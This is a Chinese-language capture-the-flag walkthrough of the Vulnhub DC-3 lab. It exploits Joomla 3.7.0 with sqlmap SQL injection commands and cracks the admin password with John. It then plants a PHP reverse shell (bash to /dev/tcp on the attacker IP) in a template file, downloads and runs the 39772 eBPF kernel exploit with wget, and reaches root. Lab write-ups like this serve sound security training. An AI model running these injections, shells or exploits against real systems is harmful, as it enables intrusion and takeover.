Vulnhub靶场 | DC系列 - DC-3

本文主要是介绍Vulnhub靶场 | DC系列 - DC-3，希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

DC-3

环境搭建

1. 靶机镜像下载地址：https://vulnhub.com/entry/dc-32,312/
2. 需要将靶机和 kali 攻击机放在同一个局域网里；
3. 本实验kali 的 IP 地址：192.168.10.146。

渗透测试

使用 nmap 扫描 192.168.10.0/24 网段存活主机

┌──(root💀kali)-[~/桌面]
└─# nmap -sP 192.168.10.0/24

经判断，目标主机IP地址为192.168.10.149。

扫描开放的服务。

访问其Web服务，显示如下，是一个DC-3的登录页

提示如下：

这一次，只有一面旗帜，一个入口点，没有线索。
要获得国旗，您显然必须获得根特权。
你如何扎根取决于你，显然，也取决于系统。
祝你好运-我希望你喜欢这个小挑战。:-)

使用msf中的dir_scanner扫描一下后台

发现有一个http://192.168.10.149:80/administrator/，经访问，为该网站的后台地址。

网站为joomla!

在msf中搜索joomla相关的脚本，使用joomla_version探测下joomla的版本。

版本为：3.7.0

搜索一个该版本的脚本看一看

看一看该脚本的说明

经分析，是sql注入漏洞。

废话不说，直接使用试一试

没有成功，提示No logged-in Administrator or Super User user found!。意思是：未找到登录管理员或超级用户用户！

难道还需要有登录的管理员才能利用？

先看看脚本怎么写的再说吧，主要关注有没有给出注入点。

但是，好像没有直接给出注入点。

使用searchsploit在exploit-db中搜索一下 joomla 3.7.0 的脚本吧，看看有么有别的脚本可用。

┌──(root💀kali)-[~]
└─# searchsploit joomla 3.7.0

查看一下php/webapps/42033.txt文件的内容

但然，直接通过https://www.exploit-db.com搜索也可以。

可以发现，这里直接给出了注入点URL和sqlmap利用方法。

直接上sqlmap。

┌──(root💀kali)-[~]
└─# sqlmap -u "http://192.168.10.149/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

结果如下

跑一下joomladb库中的表

┌──(root💀kali)-[~]
└─# sqlmap -u "http://192.168.10.149/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D joomladb --tables

其中的#__users表着重查询下。

获取字段：

┌──(root💀kali)-[~]
└─# sqlmap -u "http://192.168.10.149/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D "joomladb" -T "#__users" --columns 

获取表数据：

┌──(root💀kali)-[~]
└─# sqlmap -u "http://192.168.10.149/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D "joomladb" -T "#__users" -C name,password,username --dump

密码是加密过的，没有加密函数只能爆破密码了.

利用John工具，对该密码进行爆破拆解，工具详细信息参考John介绍及常用命令使用说明

新建一个文件，将密文写入

使用john对密文进行解密

┌──(root💀kali)-[~]
└─# john a.txt

得出最终的用户名admin，密码snoopy。

登录joomla的后台。

成功登录

根据joomla的特性，可以在模版中编辑模版文件，所以可以利用这一点进行写马。

打开Templates，里面默认有两个模版，选择任意一个即可。

比如将马写入protostar模版的error.php文件中。

// 反弹shell
<?php
system("bash -c 'bash -i >& /dev/tcp/192.168.10.146/4444 0>&1' ");
?>

在kali上开启监听：

┌──(root💀kali)-[~]
└─# nc -lvvp 4444 

浏览器访问目标网站的 error.php文件（写入马的文件）：http://192.168.10.149/templates/protostar/error.php

成功反弹shell。

但是获取到的shell权限比较低。接下来开始提权。

查找一下设置了suid的文件，并没有可以提权的命令。

换一种提权方式

使用各种查看命令，查看一下系统信息

www-data@DC-3:/var/www/html/templates/protostar$ cat /etc/issue
www-data@DC-3:/var/www/html/templates/protostar$ cat /proc/version
www-data@DC-3:/var/www/html/templates/protostar$ uname -a

搜索一下相关的漏洞利用脚本

┌──(root💀kali)-[~]
└─# searchsploit ubuntu 16.04

这里选用一个 4.4.x 相对通用的提权方式（Privilege Escalation表示提权）。

路径在linux/local/39772.txt，即/usr/share/exploitdb/exploits/linux/local/39772.txt。

文本写的是漏洞产生的原因、描述和漏洞利用的方法，还附上了exp，就是最后一行的链接。

地址如下：

Proof of Concept: 
https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552Exploit-DB Mirror: 
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

使用wget下载，出现404。

┌──(root💀kali)-[~]
└─# wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

经查询，换到了一个新的地址：https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/tree/main/bin-sploits

┌──(root💀kali)-[~]
└─# wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip

解压文件

根据前面/usr/share/exploitdb/exploits/linux/local/39772.txt文件中提到的使用方式进行操作。

需要将exploit.tar上传到目标主机，并解压运行~

kali启动http服务，将exploit.tar文件复制到网站根目录。

┌──(root💀kali)-[~]
└─# systemctl restart apache2                              ┌──(root💀kali)-[~]
└─# cp 39772/exploit.tar /var/www/html

在目标机器上使用wget进行下载

www-data@DC-3:/var/www/html/templates/protostar$ wget http://192.168.10.146/exploit.tar

加压exploit.tar文件

进入解压出来的目录

www-data@DC-3:/var/www/html/templates/protostar$ cd ebpf_mapfd_doubleput_exploit/

并按照39772.txt文件中的方式进行操作。

</templates/protostar/ebpf_mapfd_doubleput_exploit$ ./compile.sh
</templates/protostar/ebpf_mapfd_doubleput_exploit$ ./doubleput

已经获取到了root权限，但是没有交互。

利用python获取交互shell。

拿flag！

这篇关于Vulnhub靶场 | DC系列 - DC-3的文章就介绍到这儿，希望我们推荐的文章对编程师们有所帮助！

---